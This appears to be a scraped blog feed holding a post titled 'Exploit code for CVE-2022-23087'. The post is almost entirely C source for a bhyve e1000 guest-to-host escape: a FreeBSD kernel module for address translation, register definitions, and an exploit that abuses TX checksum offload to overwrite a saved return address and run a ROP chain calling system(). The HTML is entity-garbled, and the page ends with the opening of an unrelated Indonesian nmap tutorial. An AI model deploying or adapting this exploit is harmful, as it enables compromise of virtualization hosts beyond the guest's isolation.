&lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;&lt;br /&gt;&lt;/pre&gt;&lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;KMOD = pt
SRCS = pt.c
.include &lt;/pre&gt;&lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;&lt;br /&gt;&lt;/pre&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span&gt;&lt;b&gt;pt.c&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;
 &lt;/b&gt;&lt;/p&gt;&lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;&lt;b&gt;#include &lt;/b&gt;&lt;sys types.h=&quot;&quot;&gt;&lt;b&gt;
#include &lt;/b&gt;&lt;sys param.h=&quot;&quot;&gt;&lt;b&gt;
#include &lt;/b&gt;&lt;sys proc.h=&quot;&quot;&gt;&lt;b&gt;
#include &lt;/b&gt;&lt;sys module.h=&quot;&quot;&gt;&lt;b&gt;
#include &lt;/b&gt;&lt;sys sysent.h=&quot;&quot;&gt;&lt;b&gt;
#include &lt;/b&gt;&lt;sys kernel.h=&quot;&quot;&gt;&lt;b&gt;
#include &lt;/b&gt;&lt;sys sysproto.h=&quot;&quot;&gt;&lt;b&gt;
#include &lt;/b&gt;&lt;sys systm.h=&quot;&quot;&gt;&lt;b&gt;

#include &lt;/b&gt;&lt;vm vm.h=&quot;&quot;&gt;&lt;b&gt;
#include &lt;/b&gt;&lt;vm pmap.h=&quot;&quot;&gt;&lt;b&gt;
#include &lt;/b&gt;&lt;vm vm_map.h=&quot;&quot;&gt;&lt;b&gt;

struct pt_args
{
	vm_offset_t vaddr;
	uint64_t    *res;
};

static int pt(struct thread *td, void *args)
{
	struct pmap *pmap;
	struct pt_args *user = args;

	vm_offset_t vaddr = user-&amp;gt;vaddr;
	uint64_t *res = user-&amp;gt;res;

	uint64_t paddr;

	pmap = &amp;amp;td-&amp;gt;td_proc-&amp;gt;p_vmspace-&amp;gt;vm_pmap;
	paddr = pmap_extract(pmap, vaddr);

	return copyout(&amp;amp;paddr, res, sizeof(uint64_t));
}

static struct sysent pt_sysent = {
   .sy_narg = 2,
   .sy_call = pt
};

static int offset=NO_SYSCALL;

static int load(struct module *module, int cmd, void *arg)
{
	int error=0;
	switch(cmd) {
		case MOD_LOAD:
			uprintf(&quot;loading syscall at offset %d\n&quot;, offset);
			break;
		case MOD_UNLOAD:
			uprintf(&quot;unloading syscall from offset %d\n&quot;, offset);
			break;
		default:
			error=EOPNOTSUPP;
			break;
	}
	return error;
}

SYSCALL_MODULE(pt, &amp;amp;offset, &amp;amp;pt_sysent, load, NULL);&lt;/b&gt;&lt;span style=&quot;font-family: Times New Roman;&quot;&gt;&lt;span style=&quot;white-space: normal;&quot;&gt;&lt;b&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/vm&gt;&lt;/vm&gt;&lt;/vm&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;e1000.h&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;
   &lt;/b&gt;&lt;/p&gt;&lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;&lt;b&gt;#define e1000_PORT 0x2100

enum e1000_registers {

	CTRL = 0x00000,		/* Device Control - RW */

	/* Transmit */
	TXCW   = 0x0178,	/* x0178 transmit config */
	TCTL   = 0x0400,	/* x0400 transmit ctl */
	TIPG   = 0x0410,	/* x0410 inter-packet gap */
	AIT    = 0x0458,	/* x0458 Adaptive Interframe Throttle */
	TDBAL  = 0x3800,	/* x3800 desc table addr, low bits */
	TDBAH  = 0x3804,	/* x3804 desc table addr, hi 32-bits */
	TDLEN  = 0x3808,	/* x3808 # descriptors in bytes */
	TDH    = 0x3810,	/* x3810 desc table head idx */
	TDT    = 0x3818,	/* x3818 desc table tail idx */
	TIDV   = 0x3820,	/* x3820 intr delay */
	TXDCTL = 0x3828,	/* x3828 desc control */
	TADV   = 0x382c,	/* x382C intr absolute delay */

	/* Receive */
	RCTL	= 0x0100,	/* x0100 receive ctl */
	FCRTL	= 0x2160,	/* x2160 flow cntl thresh, low */
	FCRTH	= 0x2168,	/* x2168 flow cntl thresh, hi */
	RDBAL	= 0x2800,	/* x2800 desc table addr, low bits */
	RDBAH	= 0x2804,	/* x2804 desc table addr, hi 32-bits*/
	RDLEN	= 0x2808,	/* x2808 #descriptors */
	RDH	    = 0x2810,	/* x2810 desc table head idx */
	RDT	    = 0x2818,	/* x2818 desc table tail idx */
	RDTR	= 0x2820,	/* x2820 intr delay */
	RXDCTL	= 0x2828,	/* x2828 desc control */
	RADV	= 0x282c,	/* x282C intr absolute delay */
	RSRPD	= 0x2c00,	/* x2C00 recv small packet detect */
	RXCSUM  = 0x5000, 	/* x5000 receive cksum ctl */
};


/* Transmit Descriptor bit definitions */
#define E1000_TXD_DTYP_D	0x00100000 /* Data Descriptor */
#define E1000_TXD_DTYP_C	0x00000000 /* Context Descriptor */
#define E1000_TXD_POPTS_IXSM	0x01   /* Insert IP checksum */
#define E1000_TXD_POPTS_TXSM	0x02   /* Insert TCP/UDP checksum */
#define E1000_TXD_CMD_EOP	0x01000000 /* End of Packet */
#define E1000_TXD_CMD_IFCS	0x02000000 /* Insert FCS (Ethernet CRC) */
#define E1000_TXD_CMD_IC	0x04000000 /* Insert Checksum */
#define E1000_TXD_CMD_RS	0x08000000 /* Report Status */
#define E1000_TXD_CMD_RPS	0x10000000 /* Report Packet Sent */
#define E1000_TXD_CMD_DEXT	0x20000000 /* Desc extension (0 = legacy) */
#define E1000_TXD_CMD_VLE	0x40000000 /* Add VLAN tag */
#define E1000_TXD_CMD_IDE	0x80000000 /* Enable Tidv register */
#define E1000_TXD_STAT_DD	0x00000001 /* Descriptor Done */
#define E1000_TXD_STAT_EC	0x00000002 /* Excess Collisions */
#define E1000_TXD_STAT_LC	0x00000004 /* Late Collisions */
#define E1000_TXD_STAT_TU	0x00000008 /* Transmit underrun */
#define E1000_TXD_CMD_TCP	0x01000000 /* TCP packet */
#define E1000_TXD_CMD_IP	0x02000000 /* IP packet */
#define E1000_TXD_CMD_TSE	0x04000000 /* TCP Seg enable */
#define E1000_TXD_STAT_TC	0x00000004 /* Tx Underrun */
#define E1000_TXD_EXTCMD_TSTAMP	0x00000010 /* IEEE1588 Timestamp packet */

/* Transmit Control */
#define E1000_TCTL_EN		0x00000002 /* enable Tx */
#define E1000_TCTL_PSP		0x00000008 /* pad short packets */
#define E1000_TCTL_CT		0x00000ff0 /* collision threshold */
#define E1000_TCTL_COLD		0x003ff000 /* collision distance */
#define E1000_TCTL_RTLC		0x01000000 /* Re-transmit on late collision */
#define E1000_TCTL_MULR		0x10000000 /* Multiple request support */

/* Transmit descriptor types */
#define	E1000_TXD_MASK		(E1000_TXD_CMD_DEXT | 0x00F00000)
#define E1000_TXD_TYP_L		(0)
#define E1000_TXD_TYP_C		(E1000_TXD_CMD_DEXT | E1000_TXD_DTYP_C)
#define E1000_TXD_TYP_D		(E1000_TXD_CMD_DEXT | E1000_TXD_DTYP_D)

/* Receive Control */
#define E1000_RCTL_RST		0x00000001 /* Software reset */
#define E1000_RCTL_EN		0x00000002 /* enable */
#define E1000_RCTL_SBP		0x00000004 /* store bad packet */
#define E1000_RCTL_UPE		0x00000008 /* unicast promisc enable */
#define E1000_RCTL_MPE		0x00000010 /* multicast promisc enable */
#define E1000_RCTL_LPE		0x00000020 /* long packet enable */
#define E1000_RCTL_LBM_NO	0x00000000 /* no loopback mode */
#define E1000_RCTL_LBM_MAC	0x00000040 /* MAC loopback mode */
#define E1000_RCTL_LBM_TCVR	0x000000C0 /* tcvr loopback mode */
#define E1000_RCTL_DTYP_PS	0x00000400 /* Packet Split descriptor */
#define E1000_RCTL_RDMTS_HALF	0x00000000 /* Rx desc min thresh size */
#define E1000_RCTL_RDMTS_HEX	0x00010000
#define E1000_RCTL_RDMTS1_HEX	E1000_RCTL_RDMTS_HEX
#define E1000_RCTL_MO_SHIFT	12 /* multicast offset shift */
#define E1000_RCTL_MO_3		0x00003000 /* multicast offset 15:4 */
#define E1000_RCTL_BAM		0x00008000 /* broadcast enable */
/* these buffer sizes are valid if E1000_RCTL_BSEX is 0 */
#define E1000_RCTL_SZ_2048	0x00000000 /* Rx buffer size 2048 */
#define E1000_RCTL_SZ_1024	0x00010000 /* Rx buffer size 1024 */
#define E1000_RCTL_SZ_512	0x00020000 /* Rx buffer size 512 */
#define E1000_RCTL_SZ_256	0x00030000 /* Rx buffer size 256 */
/* these buffer sizes are valid if E1000_RCTL_BSEX is 1 */
#define E1000_RCTL_SZ_16384	0x00010000 /* Rx buffer size 16384 */
#define E1000_RCTL_SZ_8192	0x00020000 /* Rx buffer size 8192 */
#define E1000_RCTL_SZ_4096	0x00030000 /* Rx buffer size 4096 */
#define E1000_RCTL_VFE		0x00040000 /* vlan filter enable */
#define E1000_RCTL_CFIEN	0x00080000 /* canonical form enable */
#define E1000_RCTL_CFI		0x00100000 /* canonical form indicator */
#define E1000_RCTL_DPF		0x00400000 /* discard pause frames */
#define E1000_RCTL_PMCF		0x00800000 /* pass MAC control frames */
#define E1000_RCTL_BSEX		0x02000000 /* Buffer size extension */
#define E1000_RCTL_SECRC	0x04000000 /* Strip Ethernet CRC */

&lt;/b&gt;&lt;/pre&gt;&lt;b&gt;
   &lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;exploit.c&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;#include &lt;err .h=&quot;&quot;&gt;
#include &lt;assert .h=&quot;&quot;&gt;
#include &lt;fcntl .h=&quot;&quot;&gt;
#include &lt;inttypes .h=&quot;&quot;&gt;
#include &lt;string .h=&quot;&quot;&gt;
#include &lt;stdlib .h=&quot;&quot;&gt;
#include &lt;stdio .h=&quot;&quot;&gt;
#include &lt;unistd .h=&quot;&quot;&gt;
#include &lt;sys mman.h=&quot;&quot;&gt;
#include &lt;machine cpufunc.h=&quot;&quot;&gt;
#include &lt;arpa inet.h=&quot;&quot;&gt;

#include &quot;e1000.h&quot;

#define PAGE_SIZE 0x1000
#define BUFF_SIZE PAGE_SIZE

#define SAVED_RIP_OFF 0x3f68
#define POP_RBP       0x222164
#define POP_RDI       0x21e688
#define LEAVE         0x22dd28
#define SYSTEM        0x21f83c
#define CALC          0x7fffdebf35a8
#define ROPCHAIN      0x7fffdebf3578

#define GET_WORD(val, n) (((val) &amp;gt;&amp;gt; ((n) * 16)) &amp;amp; 0xffff)
#define MAKE_WORD(val, n) htons((htons(GET_WORD(val, n)) - 1))

#define TX_NB 64;

extern uint64_t gva_to_gpa(void *);

void xxd(void *ptr, size_t size)
{
	size_t i;
	for (i = 0; i &amp;lt; size; i++) {
		if (i % 16 == 0) printf(&quot;\n0x%&quot;PRIx64&quot;: &quot;, (uint64_t)(ptr+i));
		printf(&quot;%02x&quot;, *(uint8_t *)(ptr+i));
		if (i % 16 != 0 &amp;amp;&amp;amp; i % 2 == 1) printf(&quot; &quot;);
	}
	printf(&quot;\n&quot;);
}


/* Legacy transmit descriptor */
struct e1000_tx_desc {
	uint64_t buffer_addr;   /* Address of the descriptor&#39;s data buffer */
	union {
		uint32_t data;
		struct {
			uint16_t length;  /* Data buffer length */
			uint8_t  cso;  /* Checksum offset */
			uint8_t  cmd;  /* Descriptor control */
		} flags;
	} lower;
	union {
		uint32_t data;
		struct {
			uint8_t status; /* Descriptor status */
			uint8_t css;  /* Checksum start */
			uint16_t special;
		} fields;
	} upper;
};

/* Context descriptor */
struct e1000_context_desc {
	union {
		uint32_t ip_config;
		struct {
			uint8_t ipcss;  /* IP checksum start */
			uint8_t ipcso;  /* IP checksum offset */
			uint16_t ipcse;  /* IP checksum end */
		} ip_fields;
	} lower_setup;
	union {
		uint32_t tcp_config;
		struct {
			uint8_t tucss;  /* TCP checksum start */
			uint8_t tucso;  /* TCP checksum offset */
			uint16_t tucse;  /* TCP checksum end */
		} tcp_fields;
	} upper_setup;
	uint32_t cmd_and_length;
	union {
		uint32_t data;
		struct {
			uint8_t status;  /* Descriptor status */
			uint8_t hdr_len;  /* Header length */
			uint16_t mss;  /* Maximum segment size */
		} fields;
	} tcp_seg_setup;
};

/* Data descriptor */
struct e1000_data_desc {
	uint64_t buffer_addr;  /* Address of the descriptor&#39;s buffer address */
	union {
		uint32_t data;
		struct {
			uint16_t length;  /* Data buffer length */
			uint8_t typ_len_ext;
			uint8_t cmd;
		} flags;
	} lower;
	union {
		uint32_t data;
		struct {
			uint8_t status;  /* Descriptor status */
			uint8_t popts;  /* Packet Options */
			uint16_t special;
		} fields;
	} upper;
};

union e1000_tx_udesc {
	struct e1000_tx_desc td;
	struct e1000_context_desc cd;
	struct e1000_data_desc dd;
};

void e1000_write_reg(int reg, uint32_t val)
{
	outl(e1000_PORT + CTRL, reg);
	outl(e1000_PORT + 4, val);
}

void e1000_tx_enable()
{
	e1000_write_reg(TCTL, E1000_TCTL_EN);
}

void e1000_tx_disable()
{
	e1000_write_reg(TCTL, 0);
}

void e1000_tx_start(uint8_t tail)
{
	e1000_write_reg(TDT, tail);
}

void e1000_tx_transmit(union e1000_tx_udesc *tx_ring, uint8_t *head, struct e1000_context_desc *cd, uint16_t pktlen)
{
	// set packet context
	memcpy(&amp;amp;tx_ring[*head].cd, cd, sizeof(struct e1000_context_desc));

	// set packet data
	tx_ring[*head + 1].dd.lower.data = pktlen;
	tx_ring[*head + 1].dd.lower.data |= E1000_TXD_CMD_EOP;
	tx_ring[*head + 1].dd.lower.data |= E1000_TXD_CMD_TSE;
	tx_ring[*head + 1].dd.lower.data |= E1000_TXD_TYP_D;
	tx_ring[*head + 1].dd.upper.fields.popts = E1000_TXD_POPTS_TXSM;

	*head += 2 % TX_NB;

}

// UDP packet
static char packet[] = {
	0x58, 0x9c, 0xfc, 0x0e, 0xb7, 0x3d, 0x58, 0x9c,
	0xfc, 0x0f, 0xb4, 0x44, 0x08, 0x00, 0x45, 0x00,
	0x00, 0x21, 0x43, 0xad, 0x40, 0x00, 0x40, 0x11,
	0xf9, 0x1c, 0x01, 0x02, 0x03, 0x04, 0xc0, 0xa8,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};

int main()
{
	union e1000_tx_udesc *tx_ring;
	struct e1000_context_desc tx_cd;
	uint8_t tx_nb = TX_NB;
	uint16_t tx_size;
	char *tx_buffer[tx_nb], *buffer;
	uint8_t head = 0;
	uint64_t addr;

	uint16_t pktlen, hdrlen, paylen, mss, write_off;
	uint8_t ipcss, tucss, hdroff;

	// get permissions for in/out
	open(&quot;/dev/io&quot;, O_RDONLY, 0);

	// configure TX descriptors
	warnx(&quot;configuring TX descriptors&quot;);
	tx_size = tx_nb * sizeof(union e1000_tx_udesc);
	tx_ring = aligned_alloc(PAGE_SIZE, tx_size);
	memset(tx_ring, 0, tx_size);

	for(int i = 0; i &amp;lt; tx_nb; i++) {
		buffer = aligned_alloc(PAGE_SIZE, BUFF_SIZE);
		memcpy(buffer, packet, sizeof(packet));

		tx_buffer[i] = buffer;
		addr = gva_to_gpa(buffer);
		warnx(&quot;TX ring buffer at 0x%&quot;PRIx64&quot;\n&quot;, addr);
		tx_ring[i].dd.buffer_addr = addr;
	};

	warnx(&quot;disable TX&quot;);
	e1000_tx_disable();

	addr = gva_to_gpa(tx_ring);
	//warnx(&quot;TX ring buffer at 0x%&quot;PRIx64&quot;\n&quot;, addr);

	warnx(&quot;update TX desc table&quot;);
	e1000_write_reg(TDBAL, (uint32_t)addr);
	e1000_write_reg(TDBAH, addr &amp;gt;&amp;gt; 32);
	e1000_write_reg(TDLEN, tx_size);
	e1000_write_reg(TDH, 0);

	warnx(&quot;enable TX&quot;);
	e1000_tx_enable();

	/* fill stack with ropchain */
	hdrlen = 220;

	tx_cd.lower_setup.ip_fields.ipcss = 0;
	tx_cd.lower_setup.ip_fields.ipcso = 0;
	tx_cd.lower_setup.ip_fields.ipcse = 0;

	tx_cd.upper_setup.tcp_fields.tucss = 0;
	tx_cd.upper_setup.tcp_fields.tucso = 0;
	tx_cd.upper_setup.tcp_fields.tucse = 0;

	tx_cd.cmd_and_length = hdrlen;
	tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
	tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;

	tx_cd.tcp_seg_setup.fields.status = 0;
	tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
	tx_cd.tcp_seg_setup.fields.mss = PAGE_SIZE;

	memset(tx_buffer[head + 1], &#39;A&#39;, PAGE_SIZE);
	uint64_t *ptr =  (uint64_t *)tx_buffer[head + 1];
	*(ptr + 3) = POP_RDI;
	*(ptr + 4) = CALC;
	*(ptr + 6) = SYSTEM;
	strcpy(tx_buffer[head + 1] + 56, &quot;/usr/local/bin/xcalc&quot;);

	e1000_tx_transmit(tx_ring, &amp;amp;head, &amp;amp;tx_cd, PAGE_SIZE);

	/* corrupting saved rip + 10 */
	hdrlen = 32;
	hdroff = 0x90;
	ipcss = 12;
	tucss = 18;
	mss = htons(ROPCHAIN &amp;amp; 0xffff) - hdrlen + ipcss;
	paylen = 2 * mss;
	pktlen = paylen + hdrlen;

	tx_cd.lower_setup.ip_fields.ipcss = ipcss;
	tx_cd.lower_setup.ip_fields.ipcso = 0;
	tx_cd.lower_setup.ip_fields.ipcse = 0;

	tx_cd.upper_setup.tcp_fields.tucss = tucss;
	tx_cd.upper_setup.tcp_fields.tucso = hdroff;
	tx_cd.upper_setup.tcp_fields.tucse = tucss+1;

	tx_cd.cmd_and_length = paylen;
	tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
	tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;

	tx_cd.tcp_seg_setup.fields.status = 0;
	tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
	tx_cd.tcp_seg_setup.fields.mss = mss; // WHAT_LOW

	write_off = (SAVED_RIP_OFF + 10) - ipcss - 2;
	*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off; // WHERE
	*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(ROPCHAIN, 2);

	e1000_tx_transmit(tx_ring, &amp;amp;head, &amp;amp;tx_cd, pktlen);

	/* corrupt saved rip + 8 */
	write_off = (SAVED_RIP_OFF + 8) - ipcss - 2;
	*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off;
	*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(ROPCHAIN, 1);

	e1000_tx_transmit(tx_ring, &amp;amp;head, &amp;amp;tx_cd, pktlen);


	/* corrupt saved rip + 16 */
	mss = htons(LEAVE &amp;amp; 0xffff) - hdrlen + ipcss;
	paylen = 2 * mss;
	pktlen = paylen + hdrlen;

	tx_cd.cmd_and_length = paylen;
	tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
	tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;

	tx_cd.tcp_seg_setup.fields.status = 0;
	tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
	tx_cd.tcp_seg_setup.fields.mss = mss;

	write_off = (SAVED_RIP_OFF + 0x10) - ipcss - 2;
	*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off;
	*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(LEAVE, 1);

	e1000_tx_transmit(tx_ring, &amp;amp;head, &amp;amp;tx_cd, pktlen);

	/* corrupt saved rip */
	tucss = 0;
	mss = htons(POP_RBP &amp;amp; 0xffff) - hdrlen + ipcss; // WHAT_LOW
	paylen = 2 * mss;
	pktlen = paylen + hdrlen;

	tx_cd.upper_setup.tcp_fields.tucss = tucss;
	tx_cd.upper_setup.tcp_fields.tucse = tucss+1;

	tx_cd.cmd_and_length = paylen;
	tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
	tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;

	tx_cd.tcp_seg_setup.fields.status = 0;
	tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
	tx_cd.tcp_seg_setup.fields.mss = mss;

	write_off = SAVED_RIP_OFF - ipcss - 2;
	*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off;                 // WHERE
	*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(POP_RBP, 1);  // WHAT_HIGH

	e1000_tx_transmit(tx_ring, &amp;amp;head, &amp;amp;tx_cd, pktlen);

	e1000_tx_start(head);


	//xxd(tx_buffer, sizeof(packet));


	return 0;
}&lt;/arpa&gt;&lt;/machine&gt;&lt;/sys&gt;&lt;/unistd&gt;&lt;/stdio&gt;&lt;/stdlib&gt;&lt;/string&gt;&lt;/inttypes&gt;&lt;/fcntl&gt;&lt;/assert&gt;&lt;/err&gt;&lt;/pre&gt;
&lt;b&gt;
   &lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;mmu.c&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;
     &lt;/b&gt;&lt;/p&gt;&lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;&lt;b&gt;#include &lt;err .h=&quot;&quot;&gt;
#include &lt;inttypes .h=&quot;&quot;&gt;
#include &lt;unistd .h=&quot;&quot;&gt;
#include &lt;stdlib .h=&quot;&quot;&gt;
#include &lt;stdio .h=&quot;&quot;&gt;
#include &lt;sys syscall.h=&quot;&quot;&gt;
#include &lt;sys types.h=&quot;&quot;&gt;
#include &lt;sys module.h=&quot;&quot;&gt;

uint64_t gva_to_gpa(uint64_t vaddr)
{
	uint64_t paddr = 0;

	int nsys;
	int ret;
	int modid;

	struct module_stat stat;
	stat.version = sizeof(stat);

	modid = modfind(&quot;sys/pt&quot;);
	if (modid &amp;lt; 0)
		errx(EXIT_FAILURE, &quot;modinfo&quot;);

	ret = modstat(modid, &amp;amp;stat);
	if (ret &amp;lt; 0)
		errx(EXIT_FAILURE, &quot;modstat&quot;);

	nsys = stat.data.intval;
	ret = syscall(nsys, vaddr, &amp;amp;paddr);

	return paddr;
}
&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/stdio&gt;&lt;/stdlib&gt;&lt;/unistd&gt;&lt;/inttypes&gt;&lt;/err&gt;&lt;/b&gt;&lt;/pre&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/4428604165209444497'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/4428604165209444497'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/01/exploit-code-for-cve-2022-23087.html' title=' Exploit code for CVE-2022-23087'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifhMaNxFxaSlFM6ThAJGixQKeMtUhTqKWbqj_Mj8ViPMPA6FleuWhB969Olh_K-vlCEOgaZvS84F9ijXGaqEbd09qPM7WISE8ItAcN7hj35_YeyhejmQI5utEEh1reAFWnSaEv51dYYvHD-DYhbVHsC96e-Fpil5-KpnGGWtgdE5iR3Bs_ko3JJldl/s72-w640-h400-c/SNWL-image-394-1.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-5189072202787971352</id><published>2022-12-28T10:01:00.015-08:00</published><updated>2023-04-05T07:35:27.180-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="nmap"/><category scheme="http://www.blogger.com/atom/ns#" term="Note"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Dasar NMAP</title><content type='html'>&lt;p&gt;&lt;/p&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKC2Vp6LcmHZ97z4ofh2Zt-6P35u82u1oUlEupStiu72Ah8JyH5gtMxfHlNS6SXf7FIyCTML_4Mpd0lOw2TvEhWS8S_tgSAEydVsfXlpzxVDBHiYDRKMJeM2iljepBfsAAQqNm4y7qxI9tA6Ts7DNLCAIec2d6CyDddGNqmBB9bpgqR5ZzdruS5TTk/s597/nmap.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;314&quot; data-original-width=&quot;597&quot; height=&quot;336&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKC2Vp6LcmHZ97z4ofh2Zt-6P35u82u1oUlEupStiu72Ah8JyH5gtMxfHlNS6SXf7FIyCTML_4Mpd0lOw2TvEhWS8S_tgSAEydVsfXlpzxVDBHiYDRKMJeM2iljepBfsAAQqNm4y7qxI9tA6Ts7DNLCAIec2d6CyDddGNqmBB9bpgqR5ZzdruS5TTk/w640-h336/nmap.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: 10px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;blockquote style=&quot;border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;&quot;&gt;&lt;/blockquote&gt;&lt;span&gt;Nmap adalah salah satu tool scurity yang telah ada sejak dulu, salah satu tools legend yang luarbiasa menurut saya. NMAP ini mirip dengan tools&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;https://owasp.org/www-project-amass/&quot; target=&quot;_blank&quot;&gt;amass&lt;/a&gt;&lt;span&gt;. NMAP&lt;/span&gt;&lt;span&gt;&amp;nbsp;adalah salah satu tools yang identik dengan peretasan, dan sangat terkenal, tetapi kebanyakan orang tidak tahu bagaimana menggunakan NMAP ini secara maksimal. Pada umumnya hanya menggunakan perintah ini:&lt;/span&gt;&lt;br /&gt;&lt;blockquote style=&quot;border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;&quot;&gt;&lt;/blockquote&gt;$ nmap host&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Jika hanya menjalankan perintah ini, Anda bahkan tidak memindai semua port, dan sudah pasti tidak mendapatkan semua informasi yang dapat ditemukan oleh Nmap! Nmap pada dasarnya adalah pemindai port, tetapi fungsinya lebih dari sekadar memberi tahu port mana yang terbuka. Bahkan juga dapat menggunakan Nmap untuk menemukan bugs!&lt;/span&gt;&lt;/div&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;b&gt;&lt;span&gt;The Basic Scan&lt;/span&gt;
&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;span&gt;Secara default Nmap melakukan pemindaian TCP SYN standar pada 1000 port host teratas.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;span&gt;$ nmap host&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;&lt;span&gt;At an absolute minimum, I will get more verbosity using -v or -vv.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span&gt;Minimal absolut, saya akan mendapatkan lebih banyak verbositas menggunakan -v atau -vv.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;blockquote&gt;$ nmap -vv host&lt;/blockquote&gt;&lt;/span&gt;
